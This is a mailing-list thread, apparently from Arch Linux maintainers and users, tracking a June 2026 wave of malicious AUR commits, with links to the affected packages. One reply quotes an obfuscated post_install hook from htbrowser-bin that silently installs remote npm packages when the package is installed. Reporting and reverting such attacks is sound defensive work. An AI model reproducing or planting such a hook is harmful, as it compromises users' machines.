Hi, 

you can follow
https://github.com/archlinux/aur/activity?activity_type=force_push to
see the reverts.


On 2026-06-14 at 05:30, Nicolas Boichat wrote:
> Those too -- but I can't see the malicious commits on HEAD so I assume
> somebody took action already.
> - 
> https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e5841b9d50384b7dde9136d80fbd1415c818
> - 
> https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=191ddf65e0337ee9df30d7e643fc13f6cea3f30d
> - 
> https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a41059abbd833196b18e852453385e4
>
> On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <[email protected]> wrote:
>> There's a new wave (detected using my local Gemma E2B model FWIW).
>>
>> It's a little bit more elaborate:
>> https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8
>>
>> diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
>> new file mode 100644
>> index 000000000000..9806501accad
>> --- /dev/null
>> +++ b/htbrowser-bin-deps.install
>> @@ -0,0 +1,3 @@
>> +post_install() {
>> + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
>> $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
>> 'n'"e"'x'"t""f"'i''l''e''-''j''s'
>> +}
>>
>> On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen
>> <[email protected]> wrote:
>>> Hi everyone,
>>>
>>> we’re working hard to reset/delete all malicious commits and ban the
>>> accounts.
>>>
>>> If you find more malicious packages, please **send them as a reply to
>>> this email** to keep them all in one thread.
>>>
>>> Thanks!
>>>
>>> --
>>> tippfehlr


Reply via email to